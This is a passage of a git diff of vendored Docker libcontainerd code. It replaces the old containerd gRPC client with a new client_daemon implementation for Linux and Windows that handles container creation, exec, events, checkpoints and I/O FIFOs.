err - } return &verifiedReadCloser{ rc: rc, dgst: dgst, - verifier: verifier, + verifier: dgst.Verifier(), }, nil } diff --git 
a/vendor/github.com/docker/docker/layer/ro_layer_windows.go b/vendor/github.com/docker/docker/layer/ro_layer_windows.go index 32bd7182a3..a4f0c8088e 100644 --- a/vendor/github.com/docker/docker/layer/ro_layer_windows.go +++ b/vendor/github.com/docker/docker/layer/ro_layer_windows.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import "github.com/docker/distribution" diff --git a/vendor/github.com/docker/docker/libcontainerd/client.go b/vendor/github.com/docker/docker/libcontainerd/client.go deleted file mode 100644 index c14c1c5e46..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/client.go +++ /dev/null @@ -1,46 +0,0 @@ -package libcontainerd - -import ( - "fmt" - "sync" - - "github.com/docker/docker/pkg/locker" -) - -// clientCommon contains the platform agnostic fields used in the client structure -type clientCommon struct { - backend Backend - containers map[string]*container - locker *locker.Locker - mapMutex sync.RWMutex // protects read/write oprations from containers map -} - -func (clnt *client) lock(containerID string) { - clnt.locker.Lock(containerID) -} - -func (clnt *client) unlock(containerID string) { - clnt.locker.Unlock(containerID) -} - -// must hold a lock for cont.containerID -func (clnt *client) appendContainer(cont *container) { - clnt.mapMutex.Lock() - clnt.containers[cont.containerID] = cont - clnt.mapMutex.Unlock() -} -func (clnt *client) deleteContainer(containerID string) { - clnt.mapMutex.Lock() - delete(clnt.containers, containerID) - clnt.mapMutex.Unlock() -} - -func (clnt *client) getContainer(containerID string) (*container, error) { - clnt.mapMutex.RLock() - container, ok := clnt.containers[containerID] - defer clnt.mapMutex.RUnlock() - if !ok { - return nil, fmt.Errorf("invalid container: %s", containerID) // fixme: typed error - } - return container, nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_daemon.go 
b/vendor/github.com/docker/docker/libcontainerd/client_daemon.go new file mode 100644 index 0000000000..0706fa4daa --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_daemon.go @@ -0,0 +1,894 @@ +// +build !windows + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "context" + "encoding/json" + "fmt" + "io" + "os" + "path/filepath" + "reflect" + "runtime" + "strings" + "sync" + "syscall" + "time" + + "github.com/containerd/containerd" + apievents "github.com/containerd/containerd/api/events" + "github.com/containerd/containerd/api/types" + "github.com/containerd/containerd/archive" + "github.com/containerd/containerd/cio" + "github.com/containerd/containerd/content" + containerderrors "github.com/containerd/containerd/errdefs" + "github.com/containerd/containerd/events" + "github.com/containerd/containerd/images" + "github.com/containerd/containerd/runtime/linux/runctypes" + "github.com/containerd/typeurl" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/ioutils" + "github.com/opencontainers/image-spec/specs-go/v1" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" +) + +// InitProcessName is the name given to the first process of a +// container +const InitProcessName = "init" + +type container struct { + mu sync.Mutex + + bundleDir string + ctr containerd.Container + task containerd.Task + execs map[string]containerd.Process + oomKilled bool +} + +func (c *container) setTask(t containerd.Task) { + c.mu.Lock() + c.task = t + c.mu.Unlock() +} + +func (c *container) getTask() containerd.Task { + c.mu.Lock() + t := c.task + c.mu.Unlock() + return t +} + +func (c *container) addProcess(id string, p containerd.Process) { + c.mu.Lock() + if c.execs == nil { + c.execs = make(map[string]containerd.Process) + } + c.execs[id] = p + c.mu.Unlock() +} + +func (c 
*container) deleteProcess(id string) { + c.mu.Lock() + delete(c.execs, id) + c.mu.Unlock() +} + +func (c *container) getProcess(id string) containerd.Process { + c.mu.Lock() + p := c.execs[id] + c.mu.Unlock() + return p +} + +func (c *container) setOOMKilled(killed bool) { + c.mu.Lock() + c.oomKilled = killed + c.mu.Unlock() +} + +func (c *container) getOOMKilled() bool { + c.mu.Lock() + killed := c.oomKilled + c.mu.Unlock() + return killed +} + +type client struct { + sync.RWMutex // protects containers map + + remote *containerd.Client + stateDir string + logger *logrus.Entry + + namespace string + backend Backend + eventQ queue + containers map[string]*container +} + +func (c *client) reconnect() error { + c.Lock() + err := c.remote.Reconnect() + c.Unlock() + return err +} + +func (c *client) setRemote(remote *containerd.Client) { + c.Lock() + c.remote = remote + c.Unlock() +} + +func (c *client) getRemote() *containerd.Client { + c.RLock() + remote := c.remote + c.RUnlock() + return remote +} + +func (c *client) Version(ctx context.Context) (containerd.Version, error) { + return c.getRemote().Version(ctx) +} + +// Restore loads the containerd container. +// It should not be called concurrently with any other operation for the given ID. 
+func (c *client) Restore(ctx context.Context, id string, attachStdio StdioCallback) (alive bool, pid int, err error) { + c.Lock() + _, ok := c.containers[id] + if ok { + c.Unlock() + return false, 0, errors.WithStack(newConflictError("id already in use")) + } + + cntr := &container{} + c.containers[id] = cntr + cntr.mu.Lock() + defer cntr.mu.Unlock() + + c.Unlock() + + defer func() { + if err != nil { + c.Lock() + delete(c.containers, id) + c.Unlock() + } + }() + + var dio *cio.DirectIO + defer func() { + if err != nil && dio != nil { + dio.Cancel() + dio.Close() + } + err = wrapError(err) + }() + + ctr, err := c.getRemote().LoadContainer(ctx, id) + if err != nil { + return false, -1, errors.WithStack(wrapError(err)) + } + + attachIO := func(fifos *cio.FIFOSet) (cio.IO, error) { + // dio must be assigned to the previously defined dio for the defer above + // to handle cleanup + dio, err = cio.NewDirectIO(ctx, fifos) + if err != nil { + return nil, err + } + return attachStdio(dio) + } + t, err := ctr.Task(ctx, attachIO) + if err != nil && !containerderrors.IsNotFound(err) { + return false, -1, errors.Wrap(wrapError(err), "error getting containerd task for container") + } + + if t != nil { + s, err := t.Status(ctx) + if err != nil { + return false, -1, errors.Wrap(wrapError(err), "error getting task status") + } + + alive = s.Status != containerd.Stopped + pid = int(t.Pid()) + } + + cntr.bundleDir = filepath.Join(c.stateDir, id) + cntr.ctr = ctr + cntr.task = t + // TODO(mlaventure): load execs + + c.logger.WithFields(logrus.Fields{ + "container": id, + "alive": alive, + "pid": pid, + }).Debug("restored container") + + return alive, pid, nil +} + +func (c *client) Create(ctx context.Context, id string, ociSpec *specs.Spec, runtimeOptions interface{}) error { + if ctr := c.getContainer(id); ctr != nil { + return errors.WithStack(newConflictError("id already in use")) + } + + bdir, err := prepareBundleDir(filepath.Join(c.stateDir, id), ociSpec) + if err != nil { + 
return errdefs.System(errors.Wrap(err, "prepare bundle dir failed")) + } + + c.logger.WithField("bundle", bdir).WithField("root", ociSpec.Root.Path).Debug("bundle dir created") + + cdCtr, err := c.getRemote().NewContainer(ctx, id, + containerd.WithSpec(ociSpec), + // TODO(mlaventure): when containerd support lcow, revisit runtime value + containerd.WithRuntime(fmt.Sprintf("io.containerd.runtime.v1.%s", runtime.GOOS), runtimeOptions)) + if err != nil { + return wrapError(err) + } + + c.Lock() + c.containers[id] = &container{ + bundleDir: bdir, + ctr: cdCtr, + } + c.Unlock() + + return nil +} + +// Start create and start a task for the specified containerd id +func (c *client) Start(ctx context.Context, id, checkpointDir string, withStdin bool, attachStdio StdioCallback) (int, error) { + ctr := c.getContainer(id) + if ctr == nil { + return -1, errors.WithStack(newNotFoundError("no such container")) + } + if t := ctr.getTask(); t != nil { + return -1, errors.WithStack(newConflictError("container already started")) + } + + var ( + cp *types.Descriptor + t containerd.Task + rio cio.IO + err error + stdinCloseSync = make(chan struct{}) + ) + + if checkpointDir != "" { + // write checkpoint to the content store + tar := archive.Diff(ctx, "", checkpointDir) + cp, err = c.writeContent(ctx, images.MediaTypeContainerd1Checkpoint, checkpointDir, tar) + // remove the checkpoint when we're done + defer func() { + if cp != nil { + err := c.getRemote().ContentStore().Delete(context.Background(), cp.Digest) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "ref": checkpointDir, + "digest": cp.Digest, + }).Warnf("failed to delete temporary checkpoint entry") + } + } + }() + if err := tar.Close(); err != nil { + return -1, errors.Wrap(err, "failed to close checkpoint tar stream") + } + if err != nil { + return -1, errors.Wrapf(err, "failed to upload checkpoint to containerd") + } + } + + spec, err := ctr.ctr.Spec(ctx) + if err != nil { + return -1, 
errors.Wrap(err, "failed to retrieve spec") + } + uid, gid := getSpecUser(spec) + t, err = ctr.ctr.NewTask(ctx, + func(id string) (cio.IO, error) { + fifos := newFIFOSet(ctr.bundleDir, InitProcessName, withStdin, spec.Process.Terminal) + + rio, err = c.createIO(fifos, id, InitProcessName, stdinCloseSync, attachStdio) + return rio, err + }, + func(_ context.Context, _ *containerd.Client, info *containerd.TaskInfo) error { + info.Checkpoint = cp + info.Options = &runctypes.CreateOptions{ + IoUid: uint32(uid), + IoGid: uint32(gid), + NoPivotRoot: os.Getenv("DOCKER_RAMDISK") != "", + } + return nil + }) + if err != nil { + close(stdinCloseSync) + if rio != nil { + rio.Cancel() + rio.Close() + } + return -1, wrapError(err) + } + + ctr.setTask(t) + + // Signal c.createIO that it can call CloseIO + close(stdinCloseSync) + + if err := t.Start(ctx); err != nil { + if _, err := t.Delete(ctx); err != nil { + c.logger.WithError(err).WithField("container", id). + Error("failed to delete task after fail start") + } + ctr.setTask(nil) + return -1, wrapError(err) + } + + return int(t.Pid()), nil +} + +func (c *client) Exec(ctx context.Context, containerID, processID string, spec *specs.Process, withStdin bool, attachStdio StdioCallback) (int, error) { + ctr := c.getContainer(containerID) + if ctr == nil { + return -1, errors.WithStack(newNotFoundError("no such container")) + } + t := ctr.getTask() + if t == nil { + return -1, errors.WithStack(newInvalidParameterError("container is not running")) + } + + if p := ctr.getProcess(processID); p != nil { + return -1, errors.WithStack(newConflictError("id already in use")) + } + + var ( + p containerd.Process + rio cio.IO + err error + stdinCloseSync = make(chan struct{}) + ) + + fifos := newFIFOSet(ctr.bundleDir, processID, withStdin, spec.Terminal) + + defer func() { + if err != nil { + if rio != nil { + rio.Cancel() + rio.Close() + } + } + }() + + p, err = t.Exec(ctx, processID, spec, func(id string) (cio.IO, error) { + rio, err = 
c.createIO(fifos, containerID, processID, stdinCloseSync, attachStdio) + return rio, err + }) + if err != nil { + close(stdinCloseSync) + return -1, wrapError(err) + } + + ctr.addProcess(processID, p) + + // Signal c.createIO that it can call CloseIO + close(stdinCloseSync) + + if err = p.Start(ctx); err != nil { + p.Delete(context.Background()) + ctr.deleteProcess(processID) + return -1, wrapError(err) + } + + return int(p.Pid()), nil +} + +func (c *client) SignalProcess(ctx context.Context, containerID, processID string, signal int) error { + p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + return wrapError(p.Kill(ctx, syscall.Signal(signal))) +} + +func (c *client) ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error { + p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + return p.Resize(ctx, uint32(width), uint32(height)) +} + +func (c *client) CloseStdin(ctx context.Context, containerID, processID string) error { + p, err := c.getProcess(containerID, processID) + if err != nil { + return err + } + + return p.CloseIO(ctx, containerd.WithStdinCloser) +} + +func (c *client) Pause(ctx context.Context, containerID string) error { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + return wrapError(p.(containerd.Task).Pause(ctx)) +} + +func (c *client) Resume(ctx context.Context, containerID string) error { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + return p.(containerd.Task).Resume(ctx) +} + +func (c *client) Stats(ctx context.Context, containerID string) (*Stats, error) { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + m, err := p.(containerd.Task).Metrics(ctx) + if err != nil { + return nil, err + } + + v, err := typeurl.UnmarshalAny(m.Data) + if err != nil { + return nil, err + } + return 
interfaceToStats(m.Timestamp, v), nil +} + +func (c *client) ListPids(ctx context.Context, containerID string) ([]uint32, error) { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + pis, err := p.(containerd.Task).Pids(ctx) + if err != nil { + return nil, err + } + + var pids []uint32 + for _, i := range pis { + pids = append(pids, i.Pid) + } + + return pids, nil +} + +func (c *client) Summary(ctx context.Context, containerID string) ([]Summary, error) { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + pis, err := p.(containerd.Task).Pids(ctx) + if err != nil { + return nil, err + } + + var infos []Summary + for _, pi := range pis { + i, err := typeurl.UnmarshalAny(pi.Info) + if err != nil { + return nil, errors.Wrap(err, "unable to decode process details") + } + s, err := summaryFromInterface(i) + if err != nil { + return nil, err + } + infos = append(infos, *s) + } + + return infos, nil +} + +func (c *client) DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return 255, time.Now(), nil + } + + status, err := p.(containerd.Task).Delete(ctx) + if err != nil { + return 255, time.Now(), nil + } + + if ctr := c.getContainer(containerID); ctr != nil { + ctr.setTask(nil) + } + return status.ExitCode(), status.ExitTime(), nil +} + +func (c *client) Delete(ctx context.Context, containerID string) error { + ctr := c.getContainer(containerID) + if ctr == nil { + return errors.WithStack(newNotFoundError("no such container")) + } + + if err := ctr.ctr.Delete(ctx); err != nil { + return wrapError(err) + } + + if os.Getenv("LIBCONTAINERD_NOCLEAN") != "1" { + if err := os.RemoveAll(ctr.bundleDir); err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": containerID, + "bundle": ctr.bundleDir, + }).Error("failed to remove state dir") + } + } + + 
c.removeContainer(containerID) + + return nil +} + +func (c *client) Status(ctx context.Context, containerID string) (Status, error) { + ctr := c.getContainer(containerID) + if ctr == nil { + return StatusUnknown, errors.WithStack(newNotFoundError("no such container")) + } + + t := ctr.getTask() + if t == nil { + return StatusUnknown, errors.WithStack(newNotFoundError("no such task")) + } + + s, err := t.Status(ctx) + if err != nil { + return StatusUnknown, wrapError(err) + } + + return Status(s.Status), nil +} + +func (c *client) CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + img, err := p.(containerd.Task).Checkpoint(ctx) + if err != nil { + return wrapError(err) + } + // Whatever happens, delete the checkpoint from containerd + defer func() { + err := c.getRemote().ImageService().Delete(context.Background(), img.Name()) + if err != nil { + c.logger.WithError(err).WithField("digest", img.Target().Digest). 
+ Warnf("failed to delete checkpoint image") + } + }() + + b, err := content.ReadBlob(ctx, c.getRemote().ContentStore(), img.Target()) + if err != nil { + return errdefs.System(errors.Wrapf(err, "failed to retrieve checkpoint data")) + } + var index v1.Index + if err := json.Unmarshal(b, &index); err != nil { + return errdefs.System(errors.Wrapf(err, "failed to decode checkpoint data")) + } + + var cpDesc *v1.Descriptor + for _, m := range index.Manifests { + if m.MediaType == images.MediaTypeContainerd1Checkpoint { + cpDesc = &m + break + } + } + if cpDesc == nil { + return errdefs.System(errors.Wrapf(err, "invalid checkpoint")) + } + + rat, err := c.getRemote().ContentStore().ReaderAt(ctx, *cpDesc) + if err != nil { + return errdefs.System(errors.Wrapf(err, "failed to get checkpoint reader")) + } + defer rat.Close() + _, err = archive.Apply(ctx, checkpointDir, content.NewReader(rat)) + if err != nil { + return errdefs.System(errors.Wrapf(err, "failed to read checkpoint reader")) + } + + return err +} + +func (c *client) getContainer(id string) *container { + c.RLock() + ctr := c.containers[id] + c.RUnlock() + + return ctr +} + +func (c *client) removeContainer(id string) { + c.Lock() + delete(c.containers, id) + c.Unlock() +} + +func (c *client) getProcess(containerID, processID string) (containerd.Process, error) { + ctr := c.getContainer(containerID) + if ctr == nil { + return nil, errors.WithStack(newNotFoundError("no such container")) + } + + t := ctr.getTask() + if t == nil { + return nil, errors.WithStack(newNotFoundError("container is not running")) + } + if processID == InitProcessName { + return t, nil + } + + p := ctr.getProcess(processID) + if p == nil { + return nil, errors.WithStack(newNotFoundError("no such exec")) + } + return p, nil +} + +// createIO creates the io to be used by a process +// This needs to get a pointer to interface as upon closure the process may not have yet been registered +func (c *client) createIO(fifos *cio.FIFOSet, 
containerID, processID string, stdinCloseSync chan struct{}, attachStdio StdioCallback) (cio.IO, error) { + var ( + io *cio.DirectIO + err error + ) + + io, err = cio.NewDirectIO(context.Background(), fifos) + if err != nil { + return nil, err + } + + if io.Stdin != nil { + var ( + err error + stdinOnce sync.Once + ) + pipe := io.Stdin + io.Stdin = ioutils.NewWriteCloserWrapper(pipe, func() error { + stdinOnce.Do(func() { + err = pipe.Close() + // Do the rest in a new routine to avoid a deadlock if the + // Exec/Start call failed. + go func() { + <-stdinCloseSync + p, err := c.getProcess(containerID, processID) + if err == nil { + err = p.CloseIO(context.Background(), containerd.WithStdinCloser) + if err != nil && strings.Contains(err.Error(), "transport is closing") { + err = nil + } + } + }() + }) + return err + }) + } + + rio, err := attachStdio(io) + if err != nil { + io.Cancel() + io.Close() + } + return rio, err +} + +func (c *client) processEvent(ctr *container, et EventType, ei EventInfo) { + c.eventQ.append(ei.ContainerID, func() { + err := c.backend.ProcessEvent(ei.ContainerID, et, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ei.ContainerID, + "event": et, + "event-info": ei, + }).Error("failed to process event") + } + + if et == EventExit && ei.ProcessID != ei.ContainerID { + p := ctr.getProcess(ei.ProcessID) + if p == nil { + c.logger.WithError(errors.New("no such process")). 
+ WithFields(logrus.Fields{ + "container": ei.ContainerID, + "process": ei.ProcessID, + }).Error("exit event") + return + } + _, err = p.Delete(context.Background()) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ei.ContainerID, + "process": ei.ProcessID, + }).Warn("failed to delete process") + } + ctr.deleteProcess(ei.ProcessID) + + ctr := c.getContainer(ei.ContainerID) + if ctr == nil { + c.logger.WithFields(logrus.Fields{ + "container": ei.ContainerID, + }).Error("failed to find container") + } else { + newFIFOSet(ctr.bundleDir, ei.ProcessID, true, false).Close() + } + } + }) +} + +func (c *client) processEventStream(ctx context.Context) { + var ( + err error + ev *events.Envelope + et EventType + ei EventInfo + ctr *container + ) + + // Filter on both namespace *and* topic. To create an "and" filter, + // this must be a single, comma-separated string + eventStream, errC := c.getRemote().EventService().Subscribe(ctx, "namespace=="+c.namespace+",topic~=|^/tasks/|") + + c.logger.WithField("namespace", c.namespace).Debug("processing event stream") + + var oomKilled bool + for { + select { + case err = <-errC: + if err != nil { + errStatus, ok := status.FromError(err) + if !ok || errStatus.Code() != codes.Canceled { + c.logger.WithError(err).Error("failed to get event") + go c.processEventStream(ctx) + } else { + c.logger.WithError(ctx.Err()).Info("stopping event stream following graceful shutdown") + } + } + return + case ev = <-eventStream: + if ev.Event == nil { + c.logger.WithField("event", ev).Warn("invalid event") + continue + } + + v, err := typeurl.UnmarshalAny(ev.Event) + if err != nil { + c.logger.WithError(err).WithField("event", ev).Warn("failed to unmarshal event") + continue + } + + c.logger.WithField("topic", ev.Topic).Debug("event") + + switch t := v.(type) { + case *apievents.TaskCreate: + et = EventCreate + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ContainerID, + Pid: t.Pid, + } + case 
*apievents.TaskStart: + et = EventStart + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ContainerID, + Pid: t.Pid, + } + case *apievents.TaskExit: + et = EventExit + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ID, + Pid: t.Pid, + ExitCode: t.ExitStatus, + ExitedAt: t.ExitedAt, + } + case *apievents.TaskOOM: + et = EventOOM + ei = EventInfo{ + ContainerID: t.ContainerID, + OOMKilled: true, + } + oomKilled = true + case *apievents.TaskExecAdded: + et = EventExecAdded + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ExecID, + } + case *apievents.TaskExecStarted: + et = EventExecStarted + ei = EventInfo{ + ContainerID: t.ContainerID, + ProcessID: t.ExecID, + Pid: t.Pid, + } + case *apievents.TaskPaused: + et = EventPaused + ei = EventInfo{ + ContainerID: t.ContainerID, + } + case *apievents.TaskResumed: + et = EventResumed + ei = EventInfo{ + ContainerID: t.ContainerID, + } + default: + c.logger.WithFields(logrus.Fields{ + "topic": ev.Topic, + "type": reflect.TypeOf(t)}, + ).Info("ignoring event") + continue + } + + ctr = c.getContainer(ei.ContainerID) + if ctr == nil { + c.logger.WithField("container", ei.ContainerID).Warn("unknown container") + continue + } + + if oomKilled { + ctr.setOOMKilled(true) + oomKilled = false + } + ei.OOMKilled = ctr.getOOMKilled() + + c.processEvent(ctr, et, ei) + } + } +} + +func (c *client) writeContent(ctx context.Context, mediaType, ref string, r io.Reader) (*types.Descriptor, error) { + writer, err := c.getRemote().ContentStore().Writer(ctx, content.WithRef(ref)) + if err != nil { + return nil, err + } + defer writer.Close() + size, err := io.Copy(writer, r) + if err != nil { + return nil, err + } + labels := map[string]string{ + "containerd.io/gc.root": time.Now().UTC().Format(time.RFC3339), + } + if err := writer.Commit(ctx, 0, "", content.WithLabels(labels)); err != nil { + return nil, err + } + return &types.Descriptor{ + MediaType: mediaType, + Digest: writer.Digest(), + Size_: size, 
+ }, nil +} + +func wrapError(err error) error { + switch { + case err == nil: + return nil + case containerderrors.IsNotFound(err): + return errdefs.NotFound(err) + } + + msg := err.Error() + for _, s := range []string{"container does not exist", "not found", "no such container"} { + if strings.Contains(msg, s) { + return errdefs.NotFound(err) + } + } + return err +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go b/vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go new file mode 100644 index 0000000000..b57c4d3c50 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_daemon_linux.go @@ -0,0 +1,108 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "context" + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/containerd/containerd" + "github.com/containerd/containerd/cio" + "github.com/docker/docker/pkg/idtools" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/sirupsen/logrus" +) + +func summaryFromInterface(i interface{}) (*Summary, error) { + return &Summary{}, nil +} + +func (c *client) UpdateResources(ctx context.Context, containerID string, resources *Resources) error { + p, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + // go doesn't like the alias in 1.8, this means this need to be + // platform specific + return p.(containerd.Task).Update(ctx, containerd.WithResources((*specs.LinuxResources)(resources))) +} + +func hostIDFromMap(id uint32, mp []specs.LinuxIDMapping) int { + for _, m := range mp { + if id >= m.ContainerID && id <= m.ContainerID+m.Size-1 { + return int(m.HostID + id - m.ContainerID) + } + } + return 0 +} + +func getSpecUser(ociSpec *specs.Spec) (int, int) { + var ( + uid int + gid int + ) + + for _, ns := range ociSpec.Linux.Namespaces { + if ns.Type == specs.UserNamespace { + uid = hostIDFromMap(0, ociSpec.Linux.UIDMappings) + gid = hostIDFromMap(0, 
ociSpec.Linux.GIDMappings) + break + } + } + + return uid, gid +} + +func prepareBundleDir(bundleDir string, ociSpec *specs.Spec) (string, error) { + uid, gid := getSpecUser(ociSpec) + if uid == 0 && gid == 0 { + return bundleDir, idtools.MkdirAllAndChownNew(bundleDir, 0755, idtools.IDPair{UID: 0, GID: 0}) + } + + p := string(filepath.Separator) + components := strings.Split(bundleDir, string(filepath.Separator)) + for _, d := range components[1:] { + p = filepath.Join(p, d) + fi, err := os.Stat(p) + if err != nil && !os.IsNotExist(err) { + return "", err + } + if os.IsNotExist(err) || fi.Mode()&1 == 0 { + p = fmt.Sprintf("%s.%d.%d", p, uid, gid) + if err := idtools.MkdirAndChown(p, 0700, idtools.IDPair{UID: uid, GID: gid}); err != nil && !os.IsExist(err) { + return "", err + } + } + } + + return p, nil +} + +func newFIFOSet(bundleDir, processID string, withStdin, withTerminal bool) *cio.FIFOSet { + config := cio.Config{ + Terminal: withTerminal, + Stdout: filepath.Join(bundleDir, processID+"-stdout"), + } + paths := []string{config.Stdout} + + if withStdin { + config.Stdin = filepath.Join(bundleDir, processID+"-stdin") + paths = append(paths, config.Stdin) + } + if !withTerminal { + config.Stderr = filepath.Join(bundleDir, processID+"-stderr") + paths = append(paths, config.Stderr) + } + closer := func() error { + for _, path := range paths { + if err := os.RemoveAll(path); err != nil { + logrus.Warnf("libcontainerd: failed to remove fifo %v: %v", path, err) + } + } + return nil + } + + return cio.NewFIFOSet(config, closer) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go new file mode 100644 index 0000000000..4aba33e18c --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_daemon_windows.go @@ -0,0 +1,55 @@ +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "fmt" + "path/filepath" + + 
"github.com/containerd/containerd/cio" + "github.com/containerd/containerd/windows/hcsshimtypes" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" +) + +func summaryFromInterface(i interface{}) (*Summary, error) { + switch pd := i.(type) { + case *hcsshimtypes.ProcessDetails: + return &Summary{ + CreateTimestamp: pd.CreatedAt, + ImageName: pd.ImageName, + KernelTime100ns: pd.KernelTime_100Ns, + MemoryCommitBytes: pd.MemoryCommitBytes, + MemoryWorkingSetPrivateBytes: pd.MemoryWorkingSetPrivateBytes, + MemoryWorkingSetSharedBytes: pd.MemoryWorkingSetSharedBytes, + ProcessId: pd.ProcessID, + UserTime100ns: pd.UserTime_100Ns, + }, nil + default: + return nil, errors.Errorf("Unknown process details type %T", pd) + } +} + +func prepareBundleDir(bundleDir string, ociSpec *specs.Spec) (string, error) { + return bundleDir, nil +} + +func pipeName(containerID, processID, name string) string { + return fmt.Sprintf(`\\.\pipe\containerd-%s-%s-%s`, containerID, processID, name) +} + +func newFIFOSet(bundleDir, processID string, withStdin, withTerminal bool) *cio.FIFOSet { + containerID := filepath.Base(bundleDir) + config := cio.Config{ + Terminal: withTerminal, + Stdout: pipeName(containerID, processID, "stdout"), + } + + if withStdin { + config.Stdin = pipeName(containerID, processID, "stdin") + } + + if !config.Terminal { + config.Stderr = pipeName(containerID, processID, "stderr") + } + + return cio.NewFIFOSet(config, nil) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_linux.go b/vendor/github.com/docker/docker/libcontainerd/client_linux.go deleted file mode 100644 index 190f981865..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/client_linux.go +++ /dev/null @@ -1,605 +0,0 @@ -package libcontainerd - -import ( - "fmt" - "os" - "strings" - "sync" - "syscall" - "time" - - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/pkg/ioutils" - 
"github.com/docker/docker/pkg/mount" - "github.com/golang/protobuf/ptypes" - "github.com/golang/protobuf/ptypes/timestamp" - specs "github.com/opencontainers/runtime-spec/specs-go" - "golang.org/x/net/context" -) - -type client struct { - clientCommon - - // Platform specific properties below here. - remote *remote - q queue - exitNotifiers map[string]*exitNotifier - liveRestore bool -} - -// GetServerVersion returns the connected server version information -func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { - resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{}) - if err != nil { - return nil, err - } - - sv := &ServerVersion{ - GetServerVersionResponse: *resp, - } - - return sv, nil -} - -// AddProcess is the handler for adding a process to an already running -// container. It's called through docker exec. It returns the system pid of the -// exec'd process. -func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (pid int, err error) { - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return -1, err - } - - spec, err := container.spec() - if err != nil { - return -1, err - } - sp := spec.Process - sp.Args = specp.Args - sp.Terminal = specp.Terminal - if len(specp.Env) > 0 { - sp.Env = specp.Env - } - if specp.Cwd != nil { - sp.Cwd = *specp.Cwd - } - if specp.User != nil { - sp.User = specs.User{ - UID: specp.User.UID, - GID: specp.User.GID, - AdditionalGids: specp.User.AdditionalGids, - } - } - if specp.Capabilities != nil { - sp.Capabilities = specp.Capabilities - } - - p := container.newProcess(processFriendlyName) - - r := &containerd.AddProcessRequest{ - Args: sp.Args, - Cwd: sp.Cwd, - Terminal: sp.Terminal, - Id: containerID, - Env: sp.Env, - User: &containerd.User{ - Uid: sp.User.UID, - Gid: sp.User.GID, - AdditionalGids: 
sp.User.AdditionalGids, - }, - Pid: processFriendlyName, - Stdin: p.fifo(syscall.Stdin), - Stdout: p.fifo(syscall.Stdout), - Stderr: p.fifo(syscall.Stderr), - Capabilities: sp.Capabilities, - ApparmorProfile: sp.ApparmorProfile, - SelinuxLabel: sp.SelinuxLabel, - NoNewPrivileges: sp.NoNewPrivileges, - Rlimits: convertRlimits(sp.Rlimits), - } - - fifoCtx, cancel := context.WithCancel(context.Background()) - defer func() { - if err != nil { - cancel() - } - }() - - iopipe, err := p.openFifos(fifoCtx, sp.Terminal) - if err != nil { - return -1, err - } - - resp, err := clnt.remote.apiClient.AddProcess(ctx, r) - if err != nil { - p.closeFifos(iopipe) - return -1, err - } - - var stdinOnce sync.Once - stdin := iopipe.Stdin - iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { - var err error - stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed - err = stdin.Close() - if err2 := p.sendCloseStdin(); err == nil { - err = err2 - } - }) - return err - }) - - container.processes[processFriendlyName] = p - - if err := attachStdio(*iopipe); err != nil { - p.closeFifos(iopipe) - return -1, err - } - - return int(resp.SystemPid), nil -} - -func (clnt *client) SignalProcess(containerID string, pid string, sig int) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - _, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{ - Id: containerID, - Pid: pid, - Signal: uint32(sig), - }) - return err -} - -func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - if _, err := 